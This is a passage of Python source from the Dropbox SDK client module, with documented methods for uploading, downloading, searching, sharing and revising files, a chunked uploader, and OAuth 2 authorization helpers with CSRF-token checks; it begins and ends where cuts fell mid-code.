A file-like object to upload. If you would like, you can pass a string as file_obj.
overwrite
Whether to overwrite an existing file at the given path. (Default ``False``.)
If overwrite is False and a file already exists there, Dropbox
will rename the upload to make sure it doesn't overwrite anything.
You need to check the metadata returned for the new name.
This field should only be True if your intent is to potentially
clobber changes to a file that you don't know about.
parent_rev
Optional rev field from the 'parent' of this upload.
If your intent is to update the file at the given path, you should
pass the parent_rev parameter set to the rev value from the most recent
metadata you have of the existing file at that path. If the server
has a more recent version of the file at the specified path, it will
automatically rename your uploaded file, spinning off a conflict.
Using this parameter effectively causes the overwrite parameter to be ignored.
The file will always be overwritten if you send the most recent parent_rev,
and it will never be overwritten if you send a less recent one.
Returns
A dictionary containing the metadata of the newly uploaded file.
For a detailed description of what this call returns, visit:
https://www.dropbox.com/developers/core/docs#files-put
Raises
A :class:`dropbox.rest.ErrorResponse` with an HTTP status of:
- 400: Bad request (may be due to many things; check e.error for details).
- 503: User over quota.
"""
path = "/files_put/%s%s" % (self.session.root, format_path(full_path))
params = {
'overwrite': bool(overwrite),
}
if parent_rev is not None:
params['parent_rev'] = parent_rev
url, params, headers = self.request(path, params, method='PUT', content_server=True)
return self.rest_client.PUT(url, file_obj, headers)
def get_file(self, from_path, rev=None, start=None, length=None):
"""Download a file.
Example::
out = open('magnum-opus.txt', 'wb')
with client.get_file('/magnum-opus.txt') as f:
out.write(f.read())
which would download the file ``magnum-opus.txt`` and write the contents into
the file ``magnum-opus.txt`` on the local filesystem.
Parameters
from_path
The path to the file to be downloaded.
rev
Optional previous rev value of the file to be downloaded.
start
Optional byte value from which to start downloading.
length
Optional length in bytes for partially downloading the file. If ``length`` is
specified but ``start`` is not, then the last ``length`` bytes will be downloaded.
Returns
A :class:`dropbox.rest.RESTResponse` that is the HTTP response for
the API request. It is a file-like object that can be read from. You
must call ``close()`` when you're done.
Raises
A :class:`dropbox.rest.ErrorResponse` with an HTTP status of:
- 400: Bad request (may be due to many things; check e.error for details).
- 404: No file was found at the given path, or the file that was there was deleted.
- 200: Request was okay but response was malformed in some way.
"""
path = "/files/%s%s" % (self.session.root, format_path(from_path))
params = {}
if rev is not None:
params['rev'] = rev
url, params, headers = self.request(path, params, method='GET', content_server=True)
if start is not None:
if length:
headers['Range'] = 'bytes=%s-%s' % (start, start + length - 1)
else:
headers['Range'] = 'bytes=%s-' % start
elif length is not None:
headers['Range'] = 'bytes=-%s' % length
return self.rest_client.request("GET", url, headers=headers, raw_response=True)
def get_file_and_metadata(self, from_path, rev=None):
"""Download a file alongwith its metadata.
Acts as a thin wrapper around get_file() (see :meth:`get_file()` comments for
more details)
A typical usage looks like this::
out = open('magnum-opus.txt', 'wb')
f, metadata = client.get_file_and_metadata('/magnum-opus.txt')
with f:
out.write(f.read())
Parameters
from_path
The path to the file to be downloaded.
rev
Optional previous rev value of the file to be downloaded.
Returns
A pair of ``(response, metadata)``:
response
A :class:`dropbox.rest.RESTResponse` that is the HTTP response for
the API request. It is a file-like object that can be read from. You
must call ``close()`` when you're done.
metadata
A dictionary containing the metadata of the file (see
https://www.dropbox.com/developers/core/docs#metadata for details).
Raises
A :class:`dropbox.rest.ErrorResponse` with an HTTP status of:
- 400: Bad request (may be due to many things; check e.error for details).
- 404: No file was found at the given path, or the file that was there was deleted.
- 200: Request was okay but response was malformed in some way.
"""
file_res = self.get_file(from_path, rev)
metadata = DropboxClient.__parse_metadata_as_dict(file_res)
return file_res, metadata
@staticmethod
def __parse_metadata_as_dict(dropbox_raw_response):
# Parses file metadata from a raw dropbox HTTP response, raising a
# dropbox.rest.ErrorResponse if parsing fails.
metadata = None
for header, header_val in dropbox_raw_response.getheaders().iteritems():
if header.lower() == 'x-dropbox-metadata':
try:
metadata = json.loads(header_val)
except ValueError:
raise ErrorResponse(dropbox_raw_response)
if not metadata: raise ErrorResponse(dropbox_raw_response)
return metadata
def delta(self, cursor=None, path_prefix=None, include_media_info=False):
"""A way of letting you keep up with changes to files and folders in a
user's Dropbox. You can periodically call delta() to get a list of "delta
entries", which are instructions on how to update your local state to
match the server's state.
Parameters
cursor
On the first call, omit this argument (or pass in ``None``). On
subsequent calls, pass in the ``cursor`` string returned by the previous
call.
path_prefix
If provided, results will be limited to files and folders
whose paths are equal to or under ``path_prefix``. The ``path_prefix`` is
fixed for a given cursor. Whatever ``path_prefix`` you use on the first
``delta()`` must also be passed in on subsequent calls that use the returned
cursor.
include_media_info
If True, delta will return additional media info for photos and videos
(the time a photo was taken, the GPS coordinates of a photo, etc.). There
is a delay between when a file is uploaded to Dropbox and when this
information is available; delta will only include a file in the changelist
once its media info is ready. The value you use on the first ``delta()`` must
also be passed in on subsequent calls that use the returned cursor.
Returns
A dict with four keys:
entries
A list of "delta entries" (described below).
reset
If ``True``, you should your local state to be an empty folder
before processing the list of delta entries. This is only ``True`` only
in rare situations.
cursor
A string that is used to keep track of your current state.
On the next call to delta(), pass in this value to return entries
that were recorded since the cursor was returned.
has_more
If ``True``, then there are more entries available; you can
call delta() again immediately to retrieve those entries. If ``False``,
then wait at least 5 minutes (preferably longer) before checking again.
Delta Entries: Each entry is a 2-item list of one of following forms:
- [*path*, *metadata*]: Indicates that there is a file/folder at the given
path. You should add the entry to your local path. (The *metadata*
value is the same as what would be returned by the ``metadata()`` call.)
- If the new entry includes parent folders that don't yet exist in your
local state, create those parent folders in your local state. You
will eventually get entries for those parent folders.
- If the new entry is a file, replace whatever your local state has at
*path* with the new entry.
- If the new entry is a folder, check what your local state has at
*path*. If it's a file, replace it with the new entry. If it's a
folder, apply the new *metadata* to the folder, but do not modify
the folder's children.
- [*path*, ``None``]: Indicates that there is no file/folder at the *path* on
Dropbox. To update your local state to match, delete whatever is at *path*,
including any children (you will sometimes also get "delete" delta entries
for the children, but this is not guaranteed). If your local state doesn't
have anything at *path*, ignore this entry.
Remember: Dropbox treats file names in a case-insensitive but case-preserving
way. To facilitate this, the *path* strings above are lower-cased versions of
the actual path. The *metadata* dicts have the original, case-preserved path.
"""
path = "/delta"
params = {'include_media_info': include_media_info}
if cursor is not None:
params['cursor'] = cursor
if path_prefix is not None:
params['path_prefix'] = path_prefix
url, params, headers = self.request(path, params)
return self.rest_client.POST(url, params, headers)
def longpoll_delta(self, cursor, timeout=None):
"""A long-poll endpoint to wait for changes on an account. In conjunction with
:meth:`delta()`, this call gives you a low-latency way to monitor an account for
file changes.
Note that this call goes to ``api-notify.dropbox.com`` instead of ``api.dropbox.com``.
Unlike most other API endpoints, this call does not require OAuth authentication.
The passed-in cursor can only be acquired via an authenticated call to :meth:`delta()`.
Parameters
cursor
A delta cursor as returned from a call to :meth:`delta()`. Note that a cursor
returned from a call to :meth:`delta()` with ``include_media_info=True`` is
incompatible with ``longpoll_delta()`` and an error will be returned.
timeout
An optional integer indicating a timeout, in seconds. The default value is
30 seconds, which is also the minimum allowed value. The maximum is 480
seconds. The request will block for at most this length of time, plus up
to 90 seconds of random jitter added to avoid the thundering herd problem.
Care should be taken when using this parameter, as some network
infrastructure does not support long timeouts.
Returns
The connection will block until there are changes available or a timeout occurs.
The response will be a dictionary that looks like the following example::
{"changes": false, "backoff": 60}
For a detailed description of what this call returns, visit:
https://www.dropbox.com/developers/core/docs#longpoll-delta
Raises
A :class:`dropbox.rest.ErrorResponse` with an HTTP status of:
- 400: Bad request (generally due to an invalid parameter; check e.error for details).
"""
path = "/longpoll_delta"
params = {'cursor': cursor}
if timeout is not None:
params['timeout'] = timeout
url, params, headers = self.request(path, params, method='GET', notification_server=True)
return self.rest_client.GET(url, headers)
def create_copy_ref(self, from_path):
"""Creates and returns a copy ref for a specific file. The copy ref can be
used to instantly copy that file to the Dropbox of another account.
Parameters
path
The path to the file for a copy ref to be created on.
Returns
A dictionary that looks like the following example::
{"expires": "Fri, 31 Jan 2042 21:01:05 +0000", "copy_ref": "z1X6ATl6aWtzOGq0c3g5Ng"}
"""
path = "/copy_ref/%s%s" % (self.session.root, format_path(from_path))
url, params, headers = self.request(path, {}, method='GET')
return self.rest_client.GET(url, headers)
def add_copy_ref(self, copy_ref, to_path):
"""Adds the file referenced by the copy ref to the specified path
Parameters
copy_ref
A copy ref string that was returned from a create_copy_ref call.
The copy_ref can be created from any other Dropbox account, or from the same account.
path
The path to where the file will be created.
Returns
A dictionary containing the metadata of the new copy of the file.
"""
path = "/fileops/copy"
params = {'from_copy_ref': copy_ref,
'to_path': format_path(to_path),
'root': self.session.root}
url, params, headers = self.request(path, params)
return self.rest_client.POST(url, params, headers)
def file_copy(self, from_path, to_path):
"""Copy a file or folder to a new location.
Parameters
from_path
The path to the file or folder to be copied.
to_path
The destination path of the file or folder to be copied.
This parameter should include the destination filename (e.g.
from_path: '/test.txt', to_path: '/dir/test.txt'). If there's
already a file at the to_path it will raise an ErrorResponse.
Returns
A dictionary containing the metadata of the new copy of the file or folder.
For a detailed description of what this call returns, visit:
https://www.dropbox.com/developers/core/docs#fileops-copy
Raises
A :class:`dropbox.rest.ErrorResponse` with an HTTP status of:
- 400: Bad request (may be due to many things; check e.error for details).
- 403: An invalid copy operation was attempted
(e.g. there is already a file at the given destination,
or trying to copy a shared folder).
- 404: No file was found at given from_path.
- 503: User over storage quota.
"""
params = {'root': self.session.root,
'from_path': format_path(from_path),
'to_path': format_path(to_path),
}
url, params, headers = self.request("/fileops/copy", params)
return self.rest_client.POST(url, params, headers)
def file_create_folder(self, path):
"""Create a folder.
Parameters
path
The path of the new folder.
Returns
A dictionary containing the metadata of the newly created folder.
For a detailed description of what this call returns, visit:
https://www.dropbox.com/developers/core/docs#fileops-create-folder
Raises
A :class:`dropbox.rest.ErrorResponse` with an HTTP status of:
- 400: Bad request (may be due to many things; check e.error for details).
- 403: A folder at that path already exists.
"""
params = {'root': self.session.root, 'path': format_path(path)}
url, params, headers = self.request("/fileops/create_folder", params)
return self.rest_client.POST(url, params, headers)
def file_delete(self, path):
"""Delete a file or folder.
Parameters
path
The path of the file or folder.
Returns
A dictionary containing the metadata of the just deleted file.
For a detailed description of what this call returns, visit:
https://www.dropbox.com/developers/core/docs#fileops-delete
Raises
A :class:`dropbox.rest.ErrorResponse` with an HTTP status of:
- 400: Bad request (may be due to many things; check e.error for details).
- 404: No file was found at the given path.
"""
params = {'root': self.session.root, 'path': format_path(path)}
url, params, headers = self.request("/fileops/delete", params)
return self.rest_client.POST(url, params, headers)
def file_move(self, from_path, to_path):
"""Move a file or folder to a new location.
Parameters
from_path
The path to the file or folder to be moved.
to_path
The destination path of the file or folder to be moved.
This parameter should include the destination filename (e.g. if
``from_path`` is ``'/test.txt'``, ``to_path`` might be
``'/dir/test.txt'``). If there's already a file at the
``to_path`` it will raise an ErrorResponse.
Returns
A dictionary containing the metadata of the new copy of the file or folder.
For a detailed description of what this call returns, visit:
https://www.dropbox.com/developers/core/docs#fileops-move
Raises
A :class:`dropbox.rest.ErrorResponse` with an HTTP status of:
- 400: Bad request (may be due to many things; check e.error for details).
- 403: An invalid move operation was attempted
(e.g. there is already a file at the given destination,
or moving a shared folder into a shared folder).
- 404: No file was found at given from_path.
- 503: User over storage quota.
"""
params = {'root': self.session.root,
'from_path': format_path(from_path),
'to_path': format_path(to_path)}
url, params, headers = self.request("/fileops/move", params)
return self.rest_client.POST(url, params, headers)
def metadata(self, path, list=True, file_limit=25000, hash=None,
rev=None, include_deleted=False, include_media_info=False):
"""Retrieve metadata for a file or folder.
A typical use would be::
folder_metadata = client.metadata('/')
print "metadata:", folder_metadata
which would return the metadata of the root folder. This
will look something like::
{
'bytes': 0,
'contents': [
{
'bytes': 0,
'icon': 'folder',
'is_dir': True,
'modified': 'Thu, 25 Aug 2011 00:03:15 +0000',
'path': '/Sample Folder',
'rev': '803beb471',
'revision': 8,
'root': 'dropbox',
'size': '0 bytes',
'thumb_exists': False
},
{
'bytes': 77,
'icon': 'page_white_text',
'is_dir': False,
'mime_type': 'text/plain',
'modified': 'Wed, 20 Jul 2011 22:04:50 +0000',
'path': '/magnum-opus.txt',
'rev': '362e2029684fe',
'revision': 221922,
'root': 'dropbox',
'size': '77 bytes',
'thumb_exists': False
}
],
'hash': 'efdac89c4da886a9cece1927e6c22977',
'icon': 'folder',
'is_dir': True,
'path': '/',
'root': 'app_folder',
'size': '0 bytes',
'thumb_exists': False
}
In this example, the root folder contains two things: ``Sample Folder``,
which is a folder, and ``/magnum-opus.txt``, which is a text file 77 bytes long
Parameters
path
The path to the file or folder.
list
Whether to list all contained files (only applies when
path refers to a folder).
file_limit
The maximum number of file entries to return within
a folder. If the number of files in the folder exceeds this
limit, an exception is raised. The server will return at max
25,000 files within a folder.
hash
Every folder listing has a hash parameter attached that
can then be passed back into this function later to save on
bandwidth. Rather than returning an unchanged folder's contents,
the server will instead return a 304.
rev
Optional revision of the file to retrieve the metadata for.
This parameter only applies for files. If omitted, you'll receive
the most recent revision metadata.
include_deleted
When listing contained files, include files that have been deleted.
include_media_info
If True, includes additional media info for photos and videos if
available (the time a photo was taken, the GPS coordinates of a photo,
etc.).
Returns
A dictionary containing the metadata of the file or folder
(and contained files if appropriate).
For a detailed description of what this call returns, visit:
https://www.dropbox.com/developers/core/docs#metadata
Raises
A :class:`dropbox.rest.ErrorResponse` with an HTTP status of:
- 304: Current folder hash matches hash parameters, so contents are unchanged.
- 400: Bad request (may be due to many things; check e.error for details).
- 404: No file was found at given path.
- 406: Too many file entries to return.
"""
path = "/metadata/%s%s" % (self.session.root, format_path(path))
params = {'file_limit': file_limit,
'list': 'true',
'include_deleted': include_deleted,
'include_media_info': include_media_info,
}
if not list:
params['list'] = 'false'
if hash is not None:
params['hash'] = hash
if rev:
params['rev'] = rev
url, params, headers = self.request(path, params, method='GET')
return self.rest_client.GET(url, headers)
def preview(self, from_path, rev=None):
path = "/previews/%s%s" % (self.session.root, format_path(from_path))
params = {}
if rev is not None:
params['rev'] = rev
url, params, headers = self.request(path, params, method='GET', content_server=True)
return self.rest_client.request("GET", url, headers=headers, raw_response=True)
def thumbnail(self, from_path, size='m', format='JPEG'):
"""Download a thumbnail for an image.
Parameters
from_path
The path to the file to be thumbnailed.
size
A string specifying the desired thumbnail size. Currently
supported sizes: ``"xs"`` (32x32), ``"s"`` (64x64), ``"m"`` (128x128),
``"l``" (640x480), ``"xl"`` (1024x768).
Check https://www.dropbox.com/developers/core/docs#thumbnails for
more details.
format
The image format the server should use for the returned
thumbnail data. Either ``"JPEG"`` or ``"PNG"``.
Returns
A :class:`dropbox.rest.RESTResponse` that is the HTTP response for
the API request. It is a file-like object that can be read from. You
must call ``close()`` when you're done.
Raises
A :class:`dropbox.rest.ErrorResponse` with an HTTP status of:
- 400: Bad request (may be due to many things; check e.error for details).
- 404: No file was found at the given from_path,
or files of that type cannot be thumbnailed.
- 415: Image is invalid and cannot be thumbnailed.
"""
assert format in ['JPEG', 'PNG'], \
"expected a thumbnail format of 'JPEG' or 'PNG', got %s" % format
path = "/thumbnails/%s%s" % (self.session.root, format_path(from_path))
url, params, headers = self.request(path, {'size': size, 'format': format},
method='GET', content_server=True)
return self.rest_client.request("GET", url, headers=headers, raw_response=True)
def thumbnail_and_metadata(self, from_path, size='m', format='JPEG'):
"""Download a thumbnail for an image alongwith its metadata.
Acts as a thin wrapper around thumbnail() (see :meth:`thumbnail()` comments for
more details)
Parameters
from_path
The path to the file to be thumbnailed.
size
A string specifying the desired thumbnail size. See :meth:`thumbnail()`
for details.
format
The image format the server should use for the returned
thumbnail data. Either ``"JPEG"`` or ``"PNG"``.
Returns
A pair of ``(response, metadata)``:
response
A :class:`dropbox.rest.RESTResponse` that is the HTTP response for
the API request. It is a file-like object that can be read from. You
must call ``close()`` when you're done.
metadata
A dictionary containing the metadata of the file whose thumbnail
was downloaded (see https://www.dropbox.com/developers/core/docs#metadata
for details).
Raises
A :class:`dropbox.rest.ErrorResponse` with an HTTP status of:
- 400: Bad request (may be due to many things; check e.error for details).
- 404: No file was found at the given from_path,
or files of that type cannot be thumbnailed.
- 415: Image is invalid and cannot be thumbnailed.
- 200: Request was okay but response was malformed in some way.
"""
thumbnail_res = self.thumbnail(from_path, size, format)
metadata = DropboxClient.__parse_metadata_as_dict(thumbnail_res)
return thumbnail_res, metadata
def search(self, path, query, file_limit=1000, include_deleted=False):
"""Search folder for filenames matching query.
Parameters
path
The folder to search within.
query
The query to search on (minimum 3 characters).
file_limit
The maximum number of file entries to return within a folder.
The server will return at max 1,000 files.
include_deleted
Whether to include deleted files in search results.
Returns
A list of the metadata of all matching files (up to
file_limit entries). For a detailed description of what
this call returns, visit:
https://www.dropbox.com/developers/core/docs#search
Raises
A :class:`dropbox.rest.ErrorResponse` with an HTTP status of:
- 400: Bad request (may be due to many things; check e.error for details).
"""
path = "/search/%s%s" % (self.session.root, format_path(path))
params = {
'query': query,
'file_limit': file_limit,
'include_deleted': include_deleted,
}
url, params, headers = self.request(path, params)
return self.rest_client.POST(url, params, headers)
def revisions(self, path, rev_limit=1000):
"""Retrieve revisions of a file.
Parameters
path
The file to fetch revisions for. Note that revisions
are not available for folders.
rev_limit
The maximum number of file entries to return within
a folder. The server will return at max 1,000 revisions.
Returns
A list of the metadata of all matching files (up to rev_limit entries).
For a detailed description of what this call returns, visit:
https://www.dropbox.com/developers/core/docs#revisions
Raises
A :class:`dropbox.rest.ErrorResponse` with an HTTP status of:
- 400: Bad request (may be due to many things; check e.error for details).
- 404: No revisions were found at the given path.
"""
path = "/revisions/%s%s" % (self.session.root, format_path(path))
params = {
'rev_limit': rev_limit,
}
url, params, headers = self.request(path, params, method='GET')
return self.rest_client.GET(url, headers)
def restore(self, path, rev):
"""Restore a file to a previous revision.
Parameters
path
The file to restore. Note that folders can't be restored.
rev
A previous rev value of the file to be restored to.
Returns
A dictionary containing the metadata of the newly restored file.
For a detailed description of what this call returns, visit:
https://www.dropbox.com/developers/core/docs#restore
Raises
A :class:`dropbox.rest.ErrorResponse` with an HTTP status of:
- 400: Bad request (may be due to many things; check e.error for details).
- 404: Unable to find the file at the given revision.
"""
path = "/restore/%s%s" % (self.session.root, format_path(path))
params = {
'rev': rev,
}
url, params, headers = self.request(path, params)
return self.rest_client.POST(url, params, headers)
def media(self, path):
"""Get a temporary unauthenticated URL for a media file.
All of Dropbox's API methods require OAuth, which may cause problems in
situations where an application expects to be able to hit a URL multiple times
(for example, a media player seeking around a video file). This method
creates a time-limited URL that can be accessed without any authentication,
and returns that to you, along with an expiration time.
Parameters
path
The file to return a URL for. Folders are not supported.
Returns
A dictionary that looks like the following example::
{'url': 'https://dl.dropboxusercontent.com/1/view/abcdefghijk/example',
'expires': 'Thu, 16 Sep 2011 01:01:25 +0000'}
For a detailed description of what this call returns, visit:
https://www.dropbox.com/developers/core/docs#media
Raises
A :class:`dropbox.rest.ErrorResponse` with an HTTP status of:
- 400: Bad request (may be due to many things; check e.error for details).
- 404: Unable to find the file at the given path.
"""
path = "/media/%s%s" % (self.session.root, format_path(path))
url, params, headers = self.request(path, method='GET')
return self.rest_client.GET(url, headers)
def share(self, path, short_url=True):
"""Create a shareable link to a file or folder.
Shareable links created on Dropbox are time-limited, but don't require any
authentication, so they can be given out freely. The time limit should allow
at least a day of shareability, though users have the ability to disable
a link from their account if they like.
Parameters
path
The file or folder to share.
Returns
A dictionary that looks like the following example::
{'url': u'https://db.tt/c0mFuu1Y', 'expires': 'Tue, 01 Jan 2030 00:00:00 +0000'}
For a detailed description of what this call returns, visit:
https://www.dropbox.com/developers/core/docs#shares
Raises
A :class:`dropbox.rest.ErrorResponse` with an HTTP status of:
- 400: Bad request (may be due to many things; check e.error for details).
- 404: Unable to find the file at the given path.
"""
path = "/shares/%s%s" % (self.session.root, format_path(path))
params = {
'short_url': short_url,
}
url, params, headers = self.request(path, params, method='GET')
return self.rest_client.GET(url, headers)
class ChunkedUploader(object):
"""Contains the logic around a chunked upload, which uploads a
large file to Dropbox via the /chunked_upload endpoint.
"""
def __init__(self, client, file_obj, length):
self.client = client
self.offset = 0
self.upload_id = None
self.last_block = None
self.file_obj = file_obj
self.target_length = length
def upload_chunked(self, chunk_size = 4 * 1024 * 1024):
"""Uploads data from this ChunkedUploader's file_obj in chunks, until
an error occurs. Throws an exception when an error occurs, and can
be called again to resume the upload.
Parameters
chunk_size
The number of bytes to put in each chunk. (Default 4 MB.)
"""
while self.offset < self.target_length:
next_chunk_size = min(chunk_size, self.target_length - self.offset)
if self.last_block == None:
self.last_block = self.file_obj.read(next_chunk_size)
try:
(self.offset, self.upload_id) = self.client.upload_chunk(
StringIO(self.last_block), next_chunk_size, self.offset, self.upload_id)
self.last_block = None
except ErrorResponse as e:
# Handle the case where the server tells us our offset is wrong.
must_reraise = True
if e.status == 400:
reply = e.body
if "offset" in reply and reply['offset'] != 0 and reply['offset'] > self.offset:
self.last_block = None
self.offset = reply['offset']
must_reraise = False
if must_reraise:
raise
def finish(self, path, overwrite=False, parent_rev=None):
"""Commits the bytes uploaded by this ChunkedUploader to a file
in the users dropbox.
Parameters
path
The full path of the file in the Dropbox.
overwrite
Whether to overwrite an existing file at the given path. (Default ``False``.)
If overwrite is False and a file already exists there, Dropbox
will rename the upload to make sure it doesn't overwrite anything.
You need to check the metadata returned for the new name.
This field should only be True if your intent is to potentially
clobber changes to a file that you don't know about.
parent_rev
Optional rev field from the 'parent' of this upload.
If your intent is to update the file at the given path, you should
pass the parent_rev parameter set to the rev value from the most recent
metadata you have of the existing file at that path. If the server
has a more recent version of the file at the specified path, it will
automatically rename your uploaded file, spinning off a conflict.
Using this parameter effectively causes the overwrite parameter to be ignored.
The file will always be overwritten if you send the most recent parent_rev,
and it will never be overwritten if you send a less recent one.
"""
path = "/commit_chunked_upload/%s%s" % (self.client.session.root, format_path(path))
params = dict(
overwrite = bool(overwrite),
upload_id = self.upload_id
)
if parent_rev is not None:
params['parent_rev'] = parent_rev
url, params, headers = self.client.request(path, params, content_server=True)
return self.client.rest_client.POST(url, params, headers)
# Allow access of ChunkedUploader via DropboxClient for backwards compatibility.
DropboxClient.ChunkedUploader = ChunkedUploader
class DropboxOAuth2FlowBase(object):
def __init__(self, consumer_key, consumer_secret, locale=None, rest_client=RESTClient):
self.consumer_key = consumer_key
self.consumer_secret = consumer_secret
self.locale = locale
self.rest_client = rest_client
def _get_authorize_url(self, redirect_uri, state):
params = dict(response_type='code',
client_id=self.consumer_key)
if redirect_uri is not None:
params['redirect_uri'] = redirect_uri
if state is not None:
params['state'] = state
return self.build_url(BaseSession.WEB_HOST, '/oauth2/authorize', params)
def _finish(self, code, redirect_uri):
url = self.build_url(BaseSession.API_HOST, '/oauth2/token')
params = {'grant_type': 'authorization_code',
'code': code,
'client_id': self.consumer_key,
'client_secret': self.consumer_secret,
}
if self.locale is not None:
params['locale'] = self.locale
if redirect_uri is not None:
params['redirect_uri'] = redirect_uri
response = self.rest_client.POST(url, params=params)
access_token = response["access_token"]
user_id = response["uid"]
return access_token, user_id
def build_path(self, target, params=None):
"""Build the path component for an API URL.
This method urlencodes the parameters, adds them
to the end of the target url, and puts a marker for the API
version in front.
Parameters
target
A target url (e.g. '/files') to build upon.
params
Optional dictionary of parameters (name to value).
Returns
The path and parameters components of an API URL.
"""
if sys.version_info < (3,) and type(target) == unicode:
target = target.encode("utf8")
target_path = urllib.quote(target)
params = params or {}
params = params.copy()
if self.locale:
params['locale'] = self.locale
if params:
query_string = params_to_urlencoded(params)
return "/%s%s?%s" % (BaseSession.API_VERSION, target_path, query_string)
else:
return "/%s%s" % (BaseSession.API_VERSION, target_path)
def build_url(self, host, target, params=None):
"""Build an API URL.
This method adds scheme and hostname to the path
returned from build_path.
Parameters
target
A target url (e.g. '/files') to build upon.
params
Optional dictionary of parameters (name to value).
Returns
The full API URL.
"""
return "https://%s%s" % (host, self.build_path(target, params))
class DropboxOAuth2FlowNoRedirect(DropboxOAuth2FlowBase):
"""
OAuth 2 authorization helper for apps that can't provide a redirect URI
(such as the command-line example apps).
Example::
from dropbox.client import DropboxOAuth2FlowNoRedirect, DropboxClient
from dropbox import rest as dbrest
auth_flow = DropboxOAuth2FlowNoRedirect(APP_KEY, APP_SECRET)
authorize_url = auth_flow.start()
print "1. Go to: " + authorize_url
print "2. Click \\"Allow\\" (you might have to log in first)."
print "3. Copy the authorization code."
auth_code = raw_input("Enter the authorization code here: ").strip()
try:
access_token, user_id = auth_flow.finish(auth_code)
except dbrest.ErrorResponse, e:
print('Error: %s' % (e,))
return
c = DropboxClient(access_token)
"""
def __init__(self, consumer_key, consumer_secret, locale=None, rest_client=None):
"""
Construct an instance.
Parameters
consumer_key
Your API app's "app key"
consumer_secret
Your API app's "app secret"
locale
The locale of the user of your application. For example "en" or "en_US".
Some API calls return localized data and error messages; this setting
tells the server which locale to use. By default, the server uses "en_US".
rest_client
Optional :class:`dropbox.rest.RESTClient`-like object to use for making
requests.
"""
if rest_client is None: rest_client = RESTClient
super(DropboxOAuth2FlowNoRedirect, self).__init__(consumer_key, consumer_secret,
locale, rest_client)
def start(self):
"""
Starts the OAuth 2 authorization process.
Returns
The URL for a page on Dropbox's website. This page will let the user "approve"
your app, which gives your app permission to access the user's Dropbox account.
Tell the user to visit this URL and approve your app.
"""
return self._get_authorize_url(None, None)
def finish(self, code):
"""
If the user approves your app, they will be presented with an "authorization code". Have
the user copy/paste that authorization code into your app and then call this method to
get an access token.
Parameters
code
The authorization code shown to the user when they approved your app.
Returns
A pair of ``(access_token, user_id)``. ``access_token`` is a string that
can be passed to DropboxClient. ``user_id`` is the Dropbox user ID (string) of the
user that just approved your app.
Raises
The same exceptions as :meth:`DropboxOAuth2Flow.finish()`.
"""
return self._finish(code, None)
class DropboxOAuth2Flow(DropboxOAuth2FlowBase):
"""
OAuth 2 authorization helper. Use this for web apps.
OAuth 2 has a two-step authorization process. The first step is having the user authorize
your app. The second involves getting an OAuth 2 access token from Dropbox.
Example::
from dropbox.client import DropboxOAuth2Flow, DropboxClient
def get_dropbox_auth_flow(web_app_session):
redirect_uri = "https://my-web-server.org/dropbox-auth-finish")
return DropboxOAuth2Flow(APP_KEY, APP_SECRET, redirect_uri,
web_app_session, "dropbox-auth-csrf-token")
# URL handler for /dropbox-auth-start
def dropbox_auth_start(web_app_session, request):
authorize_url = get_dropbox_auth_flow(web_app_session).start()
redirect_to(authorize_url)
# URL handler for /dropbox-auth-finish
def dropbox_auth_finish(web_app_session, request):
try:
access_token, user_id, url_state = \\
get_dropbox_auth_flow(web_app_session).finish(request.query_params)
except DropboxOAuth2Flow.BadRequestException, e:
http_status(400)
except DropboxOAuth2Flow.BadStateException, e:
# Start the auth flow again.
redirect_to("/dropbox-auth-start")
except DropboxOAuth2Flow.CsrfException, e:
http_status(403)
except DropboxOAuth2Flow.NotApprovedException, e:
flash('Not approved? Why not?')
return redirect_to("/home")
except DropboxOAuth2Flow.ProviderException, e:
logger.log("Auth error: %s" % (e,))
http_status(403)
"""
def __init__(self, consumer_key, consumer_secret, redirect_uri, session,
csrf_token_session_key, locale=None, rest_client=None):
"""
Construct an instance.
Parameters
consumer_key
Your API app's "app key".
consumer_secret
Your API app's "app secret".
redirect_uri
The URI that the Dropbox server will redirect the user to after the user
finishes authorizing your app. This URI must be HTTPS-based and pre-registered with
the Dropbox servers, though localhost URIs are allowed without pre-registration and can
be either HTTP or HTTPS.
session
A dict-like object that represents the current user's web session (will be
used to save the CSRF token).
csrf_token_session_key
The key to use when storing the CSRF token in the session (for
example: "dropbox-auth-csrf-token").
locale
The locale of the user of your application. For example "en" or "en_US".
Some API calls return localized data and error messages; this setting
tells the server which locale to use. By default, the server uses "en_US".
rest_client
Optional :class:`dropbox.rest.RESTClient`-like object to use for making
requests.
"""
if rest_client is None: rest_client = RESTClient
super(DropboxOAuth2Flow, self).__init__(consumer_key, consumer_secret, locale, rest_client)
self.redirect_uri = redirect_uri
self.session = session
self.csrf_token_session_key = csrf_token_session_key
def start(self, url_state=None):
"""
Starts the OAuth 2 authorization process.
This function builds an "authorization URL". You should redirect your user's browser to
this URL, which will give them an opportunity to grant your app access to their Dropbox
account. When the user completes this process, they will be automatically redirected to
the ``redirect_uri`` you passed in to the constructor.
This function will also save a CSRF token to ``session[csrf_token_session_key]`` (as
provided to the constructor). This CSRF token will be checked on :meth:`finish()` to
prevent request forgery.
Parameters
url_state
Any data that you would like to keep in the URL through the
authorization process. This exact value will be returned to you by :meth:`finish()`.
Returns
The URL for a page on Dropbox's website. This page will let the user "approve"
your app, which gives your app permission to access the user's Dropbox account.
Tell the user to visit this URL and approve your app.
"""
csrf_token = base64.urlsafe_b64encode(os.urandom(16))
state = csrf_token
if url_state is not None:
state += "|" + url_state
self.session[self.csrf_token_session_key] = csrf_token
return self._get_authorize_url(self.redirect_uri, state)
def finish(self, query_params):
"""
Call this after the user has visited the authorize URL (see :meth:`start()`), approved your
app and was redirected to your redirect URI.
Parameters
query_params
The query parameters on the GET request to your redirect URI.
Returns
A tuple of ``(access_token, user_id, url_state)``. ``access_token`` can be used to
construct a :class:`DropboxClient`. ``user_id`` is the Dropbox user ID (string) of the
user that just approved your app. ``url_state`` is the value you originally passed in to
:meth:`start()`.
Raises
:class:`BadRequestException`
If the redirect URL was missing parameters or if the given parameters were not valid.
:class:`BadStateException`
If there's no CSRF token in the session.
:class:`CsrfException`
If the ``'state'`` query parameter doesn't contain the CSRF token from the user's
session.
:class:`NotApprovedException`
If the user chose not to approve your app.
:class:`ProviderException`
If Dropbox redirected to your redirect URI with some unexpected error identifier
and error message.
"""
csrf_token_from_session = self.session[self.csrf_token_session_key]
# Check well-formedness of request.
state = query_params.get('state')
if state is None:
raise self.BadRequestException("Missing query parameter 'state'.")
error = query_params.get('error')
error_description = query_params.get('error_description')
code = query_params.get('code')
if error is not None and code is not None:
raise self.BadRequestException("Query parameters 'code' and 'error' are both set; "
" only one must be set.")
if error is None and code is None:
